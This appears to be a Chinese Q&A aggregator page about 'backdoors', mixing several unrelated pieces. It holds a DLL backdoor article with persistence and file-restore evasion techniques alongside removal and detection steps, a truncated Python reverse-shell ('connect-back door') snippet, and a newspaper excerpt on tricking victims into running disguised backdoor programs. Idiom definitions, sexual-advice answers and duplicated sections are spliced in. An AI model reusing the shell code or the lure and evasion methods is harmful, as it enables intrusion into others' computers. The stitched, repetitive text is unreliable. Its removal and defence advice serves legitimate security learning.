DLL是什么类型的文件有什么作用

一、DLL的原理

1动态链接程序库

动态链接程序库，全称：Dynamic Link Library，简称：DLL，作用在于为应用程序提供扩展功能。应用程序想要调用DLL文件，需要跟其进行"动态链接"；从编程的角度，应用程序需要知道DLL文件导出的API函数方可调用。由此可见，DLL文件本身并不可以运行，需要应用程序调用。正因为DLL文件运行时必须插入到应用程序的内存模块当中，这就说明了：DLL文件无法删除。这是由于Windows内部机制造成的：正在运行的程序不能关闭。所以，DLL后门由此而生！

2DLL后门原理及特点

把一个实现了后门功能的代码写成一个DLL文件，然后插入到一个EXE文件当中，使其可以执行，这样就不需要占用进程，也就没有相对应的PID号，也就可以在任务管理器中隐藏。DLL文件本身和EXE文件相差不大，但必须使用程序（EXE）调用才能执行DLL文件。DLL文件的执行，需要EXE文件加载，但EXE想要加载DLL文件，需要知道一个DLL文件的入口函数（既DLL文件的导出函数），所以，根据DLL文件的编写标准：EXE必须执行DLL文件中的DLLMain（）作为加载的条件（如同EXE的mian（））。做DLL后门基本分为两种：1）把所有功能都在DLL文件中实现；2）把DLL做成一个启动文件，在需要的时候启动一个普通的EXE后门。

常见的编写方法：

(1)只有一个DLL文件

这类后门很简单，只把自己做成一个DLL文件，在注册表Run键值或其他可以被系统自动加载的地方，使用Rundll32exe来自动启动。Rundll32exe是什么？顾名思意，"执行32位的DLL文件"。它的作用是执行DLL文件中的内部函数，这样在进程当中，只会有Rundll32exe，而不会有DLL后门的进程，这样，就实现了进程上的隐藏。如果看到系统中有多个Rundll32exe，不必惊慌，这证明用Rundll32exe启动了多少个的DLL文件。当然，这些Rundll32exe执行的DLL文件是什么，我们都可以从系统自动加载的地方找到。

现在，我来介绍一下Rundll32exe这个文件，意思上边已经说过，功能就是以命令行的方式调用动态链接程序库。系统中还有一个Rundllexe文件，他的意思是"执行16位的DLL文件"，这里要注意一下。在来看看Rundll32exe使用的函数原型：

Void CALLBACK FunctionName (

HWND hwnd,

HINSTANCE hinst,

LPTSTR lpCmdLine,

Int nCmdShow

);

其命令行下的使用方法为：Rundll32exe DLLname,Functionname [Arguments]

DLLname为需要执行的DLL文件名；Functionname为前边需要执行的DLL文件的具体引出函数；[Arguments]为引出函数的具体参数。

(2)替换系统中的DLL文件

这类后门就比上边的先进了一些，它把实现了后门功能的代码做成一个和系统匹配的DLL文件，并把原来的DLL文件改名。遇到应用程序请求原来的DLL文件时， DLL后门就启一个转发的作用，把"参数"传递给原来的DLL文件；如果遇到特殊的请求时（比如客户端），DLL后门就开始，启动并运行了。对于这类后门，把所有 *** 作都在DLL文件中实现最为安全，但需要的编程知识也非常多，也非常不容易编写。所以，这类后门一般都是把DLL文件做成一个"启动"文件，在遇到特殊的情况下（比如客户端的请求），就启动一个普通的EXE后门；在客户端结束连接之后，把EXE后门停止，然后DLL文件进入"休息"状态，在下次客户端连接之前，都不会启动。但随着微软的"数字签名"和"文件恢复"的功能出台，这种后门已经逐步衰落。

提示：

在WINNT/system32目录下，有一个dllcache文件夹，里边存放着众多DLL文件（也包括一些重要的EXE文件），在DLL文件被非法修改之后，系统就从这里来恢复被修改的DLL文件。如果要修改某个DLL文件，首先应该把dllcache目录下的同名DLL文件删除或更名，否则系统会自动恢复。

(3)动态嵌入式

这才是DLL后门最常用的方法。其意义是将DLL文件嵌入到正在运行的系统进程当中。在Windows系统中，每个进程都有自己的私有内存空间，但还是有种种方法来进入其进程的私有内存空间，来实现动态嵌入式。由于系统的关键进程是不能终止的，所以这类后门非常隐蔽，查杀也非常困难。常见的动态嵌入式有："挂接API""全局钩子（HOOK）""远程线程"等。

远程线程技术指的是通过在一个进程中创建远程线程的方法来进入那个进程的内存地址空间。当EXE载体（或Rundll32exe）在那个被插入的进程里创建了远程线程，并命令它执行某个DLL文件时，我们的DLL后门就挂上去执行了，这里不会产生新的进程，要想让DLL后门停止，只有让这个链接DLL后门的进程终止。但如果和某些系统的关键进程链接，那就不能终止了，如果你终止了系统进程，那Windows也随即被终止！！！

3DLL后门的启动特性

启动DLL后门的载体EXE是不可缺少的，也是非常重要的，它被称为：Loader。如果没有Loader，那我们的DLL后门如何启动呢？因此，一个好的DLL后门会尽力保护自己的Loader不被查杀。Loader的方式有很多，可以是为我们的DLL后门而专门编写的一个EXE文件；也可以是系统自带的Rundll32exe，即使停止了Rundll32exe，DLL后门的主体还是存在的。3721网络实名就是一个例子，虽然它并不是"真正"的后门。

二，DLL的清除

本节以三款比较有名的DLL后门例，分别为“SvchostDLLdll”“BITSdll”“QoServerdll”。详细讲解其手工清除方法。希望大家在看过这三款DLL后门的清除方法之后，能够举一反三，灵活运用，在不惧怕DLL后门。其实，手工清除DLL后门还是比较简单的，无非就是在注册表中做文章。具体怎么做，请看下文。

1，PortLess BackDoor

这是一款功能非常强大的DLL后门程序，除了可以获得Local System权限的Shell之外，还支持如“检测克隆帐户”“安装终端服务”等一系列功能（具体可以参见程序帮助），适用Windows2000/xp/2003等系统。程序使用svchostexe来启动，平常不开端口，可以进行反向连接（最大的特点哦），对于有_blank">防火墙的主机来说，这个功能在好不过了。

在介绍清除方法之前，我们先来简单的介绍一下svchostexe这个系统的关键服务：

Svchost只是做为服务的宿主，本身并不实现什么功能，如果需要使用Svchost来启动服务，则某个服务是以DLL形式实现的，该DLL的载体Loader指向svchost，所以，在启动服务的时候由svchost调用该服务的DLL来实现启动的目的。使用svchost启动某个服务的DLL文件是由注册表中的参数来决定的，在需要启动服务的下边都有一个Parameters子键，其中的ServiceDll表明该服务由哪个DLL文件负责，并且这个DLL文件必须导出一个ServiceMain()函数，为处理服务任务提供支持。

呵呵！看了上边的理论，是不是有点蒙（我都快睡着了），别着急，我们来看看具体的内容）。我们可以看到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRpcSs下的Parameters子键，其键值为%SystemRoot%system32rpcssdll。这就说明：启动RpcSs服务时。Svchost调用WINNTsystem32目录下的rpcssdll。

这是注册表的HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchost，里边存放着Svchost启动的组和组内的各个服务，其中netsvcs组的服务最多。要使用Svchost启动某个服务，则该服务名就会出现在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchost下。这里有四种方法来实现：

1， 添加一个新的组，在组里添加服务名

2， 在现有组里添加服务名

3， 直接使用现有组里的一个服务名，但是本机没有安装的服务

4， 修改现有组里的现有服务，把它的ServiceDll指向自己的DLL后门

我测试的PortLess BackDoor使用的第三种方法。

好了，我想大家看完了上边的原理，一定可以想到我们清除PortLess BackDoor的方法了，对，就是在注册表的Svchost键下做文章。好，我们现在开始。

注：由于本文只是介绍清除方法，使用方法在此略过。

后门的Loader把SvchostDLLdll插入Svchost进程当中，所以，我们先打开Windows优化大师中的Windows进程管理25，查看Svchost进程中的模块信息，SvchostDLLdll已经插入到Svchost进程中了，在根据“直接使用现有组里的一个服务名，但是本机没有安装的服务”的提示，我们可以断定，在“管理工具”—“服务”中会有一项新的服务。证明了我的说法，此服务名称为：IPRIP，由Svchost启动，-k netsvcs表示此服务包含在netsvcs服务组中。

我们把该服务停掉，然后打开注册表编辑器（开始—运行--regedit），来到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesIPRIP下，查看其Parameters子键）。Program键的键值SvcHostDLLexe为后门的Loader；ServiceDll的键值C:WINNTsystem32svchostdlldll为调用的DLL文件，这正是后门的DLL文件。现在我们删除IPRIP子键（或者用SC来删除），然后在来到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchost下，编辑netsvcs服务组，把49 00 70 00 72 00 69 00 70 00 00 00删除，这里对应的就是IPRIP的服务名。然后退出，重启。重启之后删除WINNTsystem32目录下的后门文件即可。

2，BITSdll

这是榕哥的作品，也是DLL后门，和SvchostDLLdll原理基本一样，不过这里使用的是上边介绍的第四种方法，即“修改现有组里的现有服务，把它的ServiceDll指向自己的DLL后门”。换句话说，该后门修改现有的某一个服务，把其原有服务的DLL指向自己（也就是BITSdll），这样就达到了自动加载的目的；其次，该后门没有自己的Loader，而是使用系统自带的Rundll32exe来加载。我们还是用Windows 进程管理25来查看，从图7中，我们可以看到bitsdll已经插入到Svchost进程当中。

好，现在我们来看看具体的清除方法，由于该后门是修改现有服务，而我们并不知道具体是修改了哪个服务，所以，在注册表中搜索bitsdll，最后在HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRasAuto下搜索到了bitsdll，查看Parameters子键下的ServiceDll，其键值为C:WINNTsystem32bitsdll（如图8）。原来，该后门把RasAuto服务原来的DLL文件替换为bitsdll了，这样来实现自动加载。知道了原因就好办了，现在我们把ServiceDll的键值修改为RasAuto服务原有的DLL文件，即%SystemRoot%System32rasautodll，退出，重启。之后删除WINNTsystem32目录下的bitsdll即可。

3，NOIR--QUEEN

NOIR--QUEEN(守护者)是一个DLL后门&木马程序，服务端以DLL文件的形式插入到系统的Lsassexe进程里，由于Lsassexe是系统的关键进程，所以不能终止。在来介绍清除方法之前，我先介绍一下Lsassexe进程：

这是一个本地的安全授权服务，并且它会为使用Winlogon服务的授权用户生成一个进程，如果授权是成功的，Lsass就会产生用户的进入令牌，令牌使用启动初始 的Shell。其他的由用户初始化的进程会继承这个令牌。

从上边的介绍我们就可以看出Lsass对系统的重要性，那具体怎么清除呢？请看下文。

后门在安装成功后，会在服务中添加一个名为QoSserver的服务，并把QoSserverdll后门文件插入到Lsass进程当中，使其可以隐藏进程并自动启动（如图9）。现在我们打开注册表，来到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesQoSserver，直接删除QoSserver键，然后重启。重启之后，我们在来到服务列表中，会看到QoSserver服务还在，但没有启动，类别是自动，我们把他修改为“已禁用”；然后往上看，会发现一个服务名为AppCPI的服务，其可执行程序指向QoSserverexe（原因后边我会说到），具体如图11所示。我们再次打开注册表，来到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesAppCPI，删除AppCPI键，重启，再删除QoSserver，最后删除WINNTsystem32目录下的后门文件。

本人和这个后门“搏斗”了3个多小时，重启N次。原因在于即使删除了QoSserver服务，后门还是在运行，而且服务列表中的QoSserver服务又“死灰复燃”。后来才知道原因：在我删除了QoSserver服务并重启之后，插入到Lsass进程当中的QoSserverdll文件又恢复了QoSserver服务，并且生成了另外一个服务，即AppCPI，所以我们必须在到注册表中删除AppCPI服务才算是把该后门清除。由此可以看出，现在的后门的保护措施，真是一环扣环。

注意：在删除QoSserver服务并重启之后，恢复的QoSserver的启动类别要修改为“已禁用”，否则即便删除了AppCPI服务，QoSserver服务又运行了。

三，DLL的防范

看了上边的例子，我想大家对清除DLL后门的方法有了一定的了解，但在现实中，DLL后门并不会使用默认的文件名，所以你也就不能肯定是否中了DLL后门。对于DLL后门，system32目录下是个好地方，大多数后门也是如此，所以这里要非常注意。下面我来具体介绍一下怎么发现DLL后门，希望对大家有所帮助。

1，安装好系统和所有的应用程序之后，备份system32目录下的EXE和DLL文件：打开CMD，来到WINNTsystem32目录下，执行：dir exe>exetxt & dir dll>dlltxt，这样，就会把所有的EXE和DLL文件备份到exetxt和dlltxt文件中；日后，如发现异常，可以使用相同的命令再次备份EXE和DLL文件(这里我们假设是exe0txt和dll0txt)，并使用：fc exetxt exe0txt>exedlltxt & fc dlltxt dll0txt>exedlltxt，其意思为使用FC命令比较两次的EXE文件和DLL文件，并将比较结果保存到exedlltxt文件中。通过这种方法，我们就可以发现多出来的EXE和DLL文件，并通过文件大小，创建时间来判断是否是DLL后门。

2，使用内存/模块工具来查看进程调用的DLL文件，比如Windows优化大师中的Windows 进程管理 25。这样，可以发现进程到底调用了什么DLL文件，在结合上边用FC命令比较出来的结果，又能进一步来确定是否中了DLL后门。如果没有优化大师，可以使用TaskList，这个小工具也可以显示进程调用的DLL文件，而且还有源代码，方便修改。

3，普通后门连接需要打开特定的端口，DLL后门也不例外，不管它怎么隐藏，连接的时候都需要打开端口。我们可以用netstat –an来查看所有TCP/UDP端口的连接，以发现非法连接。大家平时要对自己打开的端口心中有数，并对netstat –an中的state属性有所了解。当然，也可以使用Fport来显示端口对应的进程，这样，系统有什么不明的连接和端口，都可以尽收眼底。

4，定期检查系统自动加载的地方，比如：注册表，Winstartbat，Autoexecbat，winini，systemini，wininitini，Autoruninf，Configsys等。其次是对服务进行管理，对系统默认的服务要有所了解，在发现有问题的服务时，可以使用Windows 2000 Server Resource Kit中的SC来删除。以上这些地方都可以用来加载DLL后门的Loader，如果我们把DLL后门Loader删除了，试问？DLL后门还怎么运行？！

通过使用上边的方法，我想大多数DLL后门都可以“现形”，如果我们平时多做一些备份，那对查找DLL后门会启到事半功倍的效果。

后记

本文详细的介绍了DLL后门的一些知识。其实，从上文中不难看出，DLL后门并没有想象的这么可怕，清除起来也比较简单。在文章中的开头我以说到：旨在能让大家对DLL后门“快速上手”，所以，希望这篇拙文能对大家有所帮助，文中如有错误，还请大家多多包涵，谢谢！

参考资料：

这是后门木马病毒,后门木马简单点说就是隐蔽性很高的木马。比如灰鸽子。后门木马就是一种由原作者在编写的木马设置了一个后门程序，比如按6下shift就d出权限设置，这种快捷键一般只有原作者才知道的，然后原作者把这种木马卖出，比如你买了他的木马并且使用，你不知道快捷键密码，所以最高权限不在你这，而在他那儿~这样你利用木马盗号的过程中原作者就会知道，也就是说原作者可能利用你盗号，你所盗的号你知道，原作者也会知道。

如果你的电脑中了后门木马病毒,你可以这样,先下载360系统急救箱保存到D盘,重启按F8进入带网络连接的安全模式,使用360系统急救箱进行查杀 这样就查杀的比较彻底了,然后启动360杀毒 360安全卫士的木马云查杀功能查杀清除残留就可以了

早期大家都用perl或c代码写。现在大家都与时俱进了，用python写了。代码量减少很多啊。小雨写的一个，替代之前的perl版本的，可以直接返回ttyshell。返回的shell可以直接ssh，su等 *** 作。代码如下：#!/usr/bin/pythonimport sysimport osimport socketimport ptyshell = "/bin/sh"def usage(programname):print "ython connect-back door"print "Usage: %s " % programnamedef main():if len(sysargv) !=3:usage(sysargv[0])

问题一：开后门是什么意思。 开后门意思是：

“ 开后门”： 比喻当权者以权谋私，为行贿者提供的方便（之门）。 开后门比喻利用职权给予他人某些不应有的方便和利益。

典故：

南宋吉水人罗大经所撰《鹤林玉露》，在甲编卷6中有“留后门”一条，其文曰：“今若直前，万一蹉跌，退将安托要须留后门，则庶几进取有据。”这里所说的“留后门”，是指办事“留退路”的意思。

“开后门”一词，则首见于明人王一鹗的《总督四镇奏议十・举劾四镇将令疏》：“占公匠六十余名，各色营造私开后门，物议沸腾。”这里的“开后门”，是指“开方便之门”，即在房屋的两侧或后面开一些小门，以方便人的出入。

关于“后门”，据酒徒新书《家园》描述：大隋朝承袭汉制，官府衙门都是坐北朝南。如果职位高到可携带家眷上任，官员的妻儿老小通常都安置在衙门后宅。平素公务往来，客人走得全是前门，只有私交甚好的朋友或者自家晚辈才走后门入内。

今一般指通过某种关系达到自身不能达到的目的

词 性：

贬义

其它解释

(1)比喻留退路。《朱子语类》卷一○五：“除非那人做工夫大段严迫，然后劝他勿迫切。如人相杀，未曾交锋，便要引退。今未曾做工夫在，便要开后门。然亦不解迫切，只是不曾做，做著时不患其迫切。” 明 《杀狗记・王老谏主》：“[生]请问爹爹，今年田地有收么？[�]种得便有收，不种没收。[丑] 孙阿伯 的说话，也是开后门的。”《绿野仙踪》第四二回：“ 如玉 坐下说道：‘我原不计论他，若计论他，也不来了。’ 苗秃子 道：‘这都是开后门的话。’”

(2)指开方便之门，给予通融。 克非 《春潮急》四：“提倡‘自由借货’，不妥吧？我仿佛记得一九五三年总路线公布后，各地在批判‘四大自由’时，就批判过。那样搞，实际上是给高利贷开后门呢！”

问题二：电脑上开后门是什么意思 每一个电脑端口就是一个后门有后门黑客就有可乘之机

电脑后门三种关法

电脑为什么会被“入侵”？首先，我们先来谈谈个人电脑入侵的原理。我们可以把一台已联网的个人电脑当做是一台几乎所有常用端口（Telnet、FTP等）都被封闭的服务器。那么从攻击手段上来讲，常用的端口查询法就失灵了。但是，由于服务器的端口最大可以有65535个，实际上常用的端口才几十个，可以看出未定义端口相当的多。这就表示我们可以采用某种方法定义出一个特殊的端口来达到入侵的目的。为了定义出这个端口，就要依靠某种程序在机器启动之前自动加载到内存，强行控制机器打开那个特殊的端口。这个程序就是“后门”程序。简单的说，我们先通过某种手段在一台个人电脑中植入一个程序，使这台机器变成一台开放性极高（用户拥有极高权限）的FTP服务器，然后就可以达到侵入的目的。

很明显，光有“后门”程序是不够的。一个好的控制工具一般分成两个部分：一个是Client，也就是客户服务程序，我们用它来控制已经打开后门的机器；另一个是Trojan／Host，也就是“后门”程序了，我们用它来开放某台机器。假设我们想控制机器A。那么我们通过一些手段来把“后门”程序传到机器A上并使其运行之，这样A就变成了一台特殊FTP的服务器，然后我们使用Client程序就可以控制A了。

当然了，后门程序如果不运行也就无法发挥作用。因此，我们再来讲讲如何“诱骗”他人使用后门程序。如果是朋友，去他机器那儿偷偷地装上就行了。但是，我们主要的对象是不熟悉的人，那就需要一些方法了。第一，我们先要和他搞好关系，然后就可以问他：“我有一个不错的程序要不要看看？”或者“给你一张我的照片怎么样？”当那个可怜的人说“行呀！给我传过来吧！”我们的第一步就达成了：）。第二步就是伪装术了。简单一些的话是直接把后门程序改名，改成一些常见的名称如ICQNuke、Readme等或者更改后缀，变成TXT或者文件格式。这样当他双击这些伪装的程序后就达到了运行的目的了。复杂一些的方法是利用Winzip的SelfExtrator软件把后门程序和一些其它的东西一起制作成一个自解压的压缩包，然后利用设定解压后自动运行Setup程序的功能来运行指定的“后门”程序。这样当他双击自解压程序后，还没等回过味来，程序就已经运行完了。对于高手来说，他们经常会编写一些程序，把“后门”藏在其中。

最后，当你知道了他的IP后，就可以利用客户服务程序去接管目标机器了。

我们已经知道了常用的“诱骗”方法，那么该如何预防后门程序的植入呢？第一，不要随便接受陌生人发来的电子邮件、文件。第二，喜欢聊天的朋友不要轻易暴露自己的IP（大部分人上网的IP都是动态分配的，因此，只要不随便暴露IP，就能较为有效地防止他人入侵）。第三，不要用Windows自带的密码记忆功能来存放你ISP的密码，这种密码保存在Windows／目录下，后缀是PWL的文件中。

《北京青年报》 2000年07月05日

问题三：开后门是什么意思 托关系，用非正常的手段达到自己的目的

问题四：电脑上开后门是什么意思啊？ 木马病毒源自古希腊特洛伊战争中著名的“木马计”而得名，顾名思义就是一种伪装潜伏的网络病毒，等待时机成熟就出来害人。

传染方式:通过电子邮件附件发出，捆绑在其他的程序中。

病毒特性:会修改注册表、驻留内存、在系统中安装后门程序、开机加载附带的木马。

木马病毒的破坏性:木马病毒的发作要在用户的机器里运行客户端程序，一旦发作，就可设置后门，定时地发送该用户的隐私到木马程序指定的地址，一般同时内置可进入该用户电脑的端口，并可任意控制此计算机，进行文件删除、拷贝、改密码等非法 *** 作。

川防范措施:用户提高警惕，不下载和运行来历不明的程序，对于不明来历的邮件附件也不要随意打开。

如何用木马病毒**他人信息？？？

它是样**的！你中了木马的服务端后，木马服务端就会在你的电脑上开端口（也就是所说的后门），等待远程的客户端的主到连接（这是主到连接式木马，但这种木马不好，如果你开防火墙了，他可以就连接不到你，因为它在连接你的时候，防火墙会向你寻问是否允许连接），还有一种是反d式木马，服务端运行后会主动去连接客户端，一但连接上了客户端（也就是制作这个木马的人的电脑），那他就能通过一些“益出”漏洞什么的，拿到你电脑的一定权限，然后再通过一些提权的方法，最终在你的电脑上建个管理账号，就能远程控制你的电脑，通过一些命令，如xcopy等或架设个小型ftp服务器把你的文件烤到自己的电脑上，或在你的电脑上看！

也有一些木马能记录你键盘输入的口令，并自动发送到指定邮箱或空间！这样你的信息就被盗走了！

说的点乱，但就是这样的！你将就看看吧！希望你能看懂！

问题五：计算机被开了后门是什么意思 计算机被开了后门就是说中了后门木马，他会**计算机信息

问题六：一个风水师说我家围墙不用开后门都可以是什么意思 后门的作用有很多，所以代表的意义也就不尽相同~

以前的后门都是出现在大户人家的庭院：

开始是由下人或者仆人专走的门径，后来因为方便，所以发展和推广的很快。虽然从某种意义上看确实方便很多，但带来的问题和严重性也有很多，如下人偷约、仆人偷溜、夹带、盗贼行窃、外人入侵、密谋、私会等等往往都行此门，所以后门又被看作是灾门、败门、破财门或者小人之门~ 正因如此，后来许多大户人家的豪宅把后门（升级）改为偏门，因而减少了很多不利因素~

不知你们家为什么要开后门，也不知道你们请的风水师说不用开后门的原因。现在鱼龙混杂、唯利是图的人太多，有时间还是问清楚比较好~

问题七：形容开后门的成语 走后门

拼 音zǒu hòu mén

解 释比喻通过托情或利用职权等不正当的途径谋取通融或利益。

诗例阿袁(即陈忠远)《北兵马司新授课点即事》(二首之二)诗:人知天上云，风日每推尊。自觉导先路，何曾走后门!

文例 《坚持四项基本原则》:违反党的原则，闹派性，搞特殊化，走后门，铺张浪费，损公肥私。

事 例路遥《平凡的世界》第四卷第54章:~就~!为了给少平办成这事，她甚至故意让'关口'上的人知道她是谁的女儿!

近义词走捷径

歇后语耗子倒洞

用 法作谓语、宾语、定语;用于处事。

问题一：性走后门是什么意思 首先你们如果是初婚夫妇的话这比较正常，在没有达到比较深层次的了解对方，对这种事还是有紧张的，只要做多了，平常了就可以达到正常状态

然后，如果经常导致这样的情况，建议还是去医院做检查。

最后要说的，前戏一定要掌握好，别急匆匆就进入。但是对你说可能作用不大，你只有起引导作用，同时你还要经常鼓励他，别让他对此缺乏自信（男人的自信极为重要，所以别用这事打击男人）。不一定要说出来，给一个眼神啊，都是比较好方式。

问题二：开后门是什么意思。 开后门意思是：

“ 开后门”： 比喻当权者以权谋私，为行贿者提供的方便（之门）。 开后门比喻利用职权给予他人某些不应有的方便和利益。

典故：

南宋吉水人罗大经所撰《鹤林玉露》，在甲编卷6中有“留后门”一条，其文曰：“今若直前，万一蹉跌，退将安托要须留后门，则庶几进取有据。”这里所说的“留后门”，是指办事“留退路”的意思。

“开后门”一词，则首见于明人王一鹗的《总督四镇奏议十・举劾四镇将令疏》：“占公匠六十余名，各色营造私开后门，物议沸腾。”这里的“开后门”，是指“开方便之门”，即在房屋的两侧或后面开一些小门，以方便人的出入。

关于“后门”，据酒徒新书《家园》描述：大隋朝承袭汉制，官府衙门都是坐北朝南。如果职位高到可携带家眷上任，官员的妻儿老小通常都安置在衙门后宅。平素公务往来，客人走得全是前门，只有私交甚好的朋友或者自家晚辈才走后门入内。

今一般指通过某种关系达到自身不能达到的目的

词 性：

贬义

其它解释

(1)比喻留退路。《朱子语类》卷一○五：“除非那人做工夫大段严迫，然后劝他勿迫切。如人相杀，未曾交锋，便要引退。今未曾做工夫在，便要开后门。然亦不解迫切，只是不曾做，做著时不患其迫切。” 明 《杀狗记・王老谏主》：“[生]请问爹爹，今年田地有收么？[]种得便有收，不种没收。[丑] 孙阿伯 的说话，也是开后门的。”《绿野仙踪》第四二回：“ 如玉 坐下说道：‘我原不计论他，若计论他，也不来了。’ 苗秃子 道：‘这都是开后门的话。’”

(2)指开方便之门，给予通融。 克非 《春潮急》四：“提倡‘自由借货’，不妥吧？我仿佛记得一九五三年总路线公布后，各地在批判‘四大自由’时，就批判过。那样搞，实际上是给高利贷开后门呢！”

问题三：电脑上开后门是什么意思 每一个电脑端口就是一个后门有后门黑客就有可乘之机

电脑后门三种关法

电脑为什么会被“入侵”？首先，我们先来谈谈个人电脑入侵的原理。我们可以把一台已联网的个人电脑当做是一台几乎所有常用端口（Telnet、FTP等）都被封闭的服务器。那么从攻击手段上来讲，常用的端口查询法就失灵了。但是，由于服务器的端口最大可以有65535个，实际上常用的端口才几十个，可以看出未定义端口相当的多。这就表示我们可以采用某种方法定义出一个特殊的端口来达到入侵的目的。为了定义出这个端口，就要依靠某种程序在机器启动之前自动加载到内存，强行控制机器打开那个特殊的端口。这个程序就是“后门”程序。简单的说，我们先通过某种手段在一台个人电脑中植入一个程序，使这台机器变成一台开放性极高（用户拥有极高权限）的FTP服务器，然后就可以达到侵入的目的。

很明显，光有“后门”程序是不够的。一个好的控制工具一般分成两个部分：一个是Client，也就是客户服务程序，我们用它来控制已经打开后门的机器；另一个是Trojan／Host，也就是“后门”程序了，我们用它来开放某台机器。假设我们想控制机器A。那么我们通过一些手段来把“后门”程序传到机器A上并使其运行之，这样A就变成了一台特殊FTP的服务器，然后我们使用Client程序就可以控制A了。

当然了，后门程序如果不运行也就无法发挥作用。因此，我们再来讲讲如何“诱骗”他人使用后门程序。如果是朋友，去他机器那儿偷偷地装上就行了。但是，我们主要的对象是不熟悉的人，那就需要一些方法了。第一，我们先要和他搞好关系，然后就可以问他：“我有一个不错的程序要不要看看？”或者“给你一张我的照片怎么样？”当那个可怜的人说“行呀！给我传过来吧！”我们的第一步就达成了：）。第二步就是伪装术了。简单一些的话是直接把后门程序改名，改成一些常见的名称如ICQNuke、Readme等或者更改后缀，变成TXT或者文件格式。这样当他双击这些伪装的程序后就达到了运行的目的了。复杂一些的方法是利用Winzip的SelfExtrator软件把后门程序和一些其它的东西一起制作成一个自解压的压缩包，然后利用设定解压后自动运行Setup程序的功能来运行指定的“后门”程序。这样当他双击自解压程序后，还没等回过味来，程序就已经运行完了。对于高手来说，他们经常会编写一些程序，把“后门”藏在其中。

最后，当你知道了他的IP后，就可以利用客户服务程序去接管目标机器了。

我们已经知道了常用的“诱骗”方法，那么该如何预防后门程序的植入呢？第一，不要随便接受陌生人发来的电子邮件、文件。第二，喜欢聊天的朋友不要轻易暴露自己的IP（大部分人上网的IP都是动态分配的，因此，只要不随便暴露IP，就能较为有效地防止他人入侵）。第三，不要用Windows自带的密码记忆功能来存放你ISP的密码，这种密码保存在Windows／目录下，后缀是PWL的文件中。

《北京青年报》 2000年07月05日

问题四：后门的含义是什么？ 后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。

“后门”一词，始于何时？近读南宋吉水人罗大经所撰《鹤林玉露》，在甲编卷6中有“留后门”一条，其文曰：“今若直前，万一蹉跌，退将安托？要须留后门，则庶几进取有据。”这里所说的“留后门”，是指办事“留退路”的意思。

问题五：后门是什么意思 后门 （汉语词语）

后门，指房间的背后的可以自由出入的门，在后面的、通常又是偏远的或在地理上与主要进路线方向相反的入口或进路。

现今主要是指说靠着金钱利益关系，不通过正常途径获取的名利，具有华而不实，贬义的色彩。

中文名

后门

外文名

ㄏㄡA ㄇㄣ@

拼 音

hòu mén

基本解释

后部的门

问题六：篮球中的抄后门是什么意思？ 和溜底线差不多，防守人往上线夹击持球人的同时，进攻方乘机向底线溜，到篮下接球上篮。

问题七：后门是什么意思？ 我只听过后门软件，就是可以不经你同意就进入你的电脑试图干些事的软件

或者软件有后门就是软件本身有BUG，然后可以通过BUG不经你同意就进入你的电脑试图干些事

问题八：性走后门是什么意思 就是女方背对你躺下你从后面进入的一种 姿势。

问题九：进后门是什么意思 走关系吧。。

问题十：黑客后门是什么意思 后门程序就是留在计算机系统中，供某位特殊使用者通过某种特殊方式控制计算机系统的途径。[1]

后门程序，跟我们通常所说的木马有联系也有区别。联系在于：都是隐藏在用户系统中向外发送信息,而且本身具有一定权限,以便远程机器对本机的控制。区别在于：木马是一个完整的软件,而后门则体积较小且功能都很单一。后门程序类似于特洛依木马（简称木马），其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。

后门程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会“感染”其它电脑。

后门是一种登录系统的方法，它不仅绕过系统已有的安全设置，而且还能挫败系统上各种增强的安全设置。

而且,在病毒命名中，后门一般带有backdoor字样，而木马一般则是Trojan字样。

backdoor是后门的意思，后面加上generic一般是下载者类病毒的意思，这种病毒工作原理是先在宿住电脑上种下木马病毒，**个人隐私信息，比如你的QQ信息，另外还会向指定从网站下载多种病毒，木马，造成多重危害。。等等。。

具体怎样识别病毒，看看这个文章：

怎样识别各类各样的病毒

病毒前缀是指一个病毒的种类，他是用来区别病毒的种族分类的。不同的种类的病毒，其前缀也是不同的。比如我们常见的木马病毒的前缀Trojan，蠕虫病毒的前缀是Worm等等还有其他的。

病毒名是指一个病毒的家族特征，是用来区别和标识病毒家族的，如以前著名的CIH病毒的家族名都是统一的“CIH”，还有近期闹得正欢的振荡波蠕虫病毒的家族名是“Sasser”。

病毒后缀是指一个病毒的变种特征，是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示，如WormSasserb就是指振荡波蠕虫病毒的变种B，因此一般称为 “振荡波B变种”或者“振荡波变种B”。如果该病毒变种非常多（也表明该病毒生命力顽强），可以采用数字与字母混合表示变种标识。

综上所述，一个病毒的前缀对我们快速的判断该病毒属于哪种类型的病毒是有非常大的帮助的。通过判断病毒的类型，就可以对这个病毒有个大概的评估（当然这需要积累一些常见病毒类型的相关知识，这不在本文讨论范围）。而通过病毒名我们可以利用查找资料等方式进一步了解该病毒的详细特征。病毒后缀能让我们知道现在在你机子里呆着的病毒是哪个变种。

下面附带一些常见的病毒前缀的解释（针对我们用得最多的Windows *** 作系统）：

1、系统病毒

系统病毒的前缀为：Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染Windows *** 作系统的 exe 和 dll 文件，并通过这些文件进行传播。如CIH病毒。

2、蠕虫病毒

蠕虫病毒的前缀是：Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播，很大部分的蠕虫病毒都有向外发送带毒邮件，阻塞网络的特性。比如冲击波（阻塞网络），小邮差（发带毒邮件）等。

3、木马病毒、黑客病毒

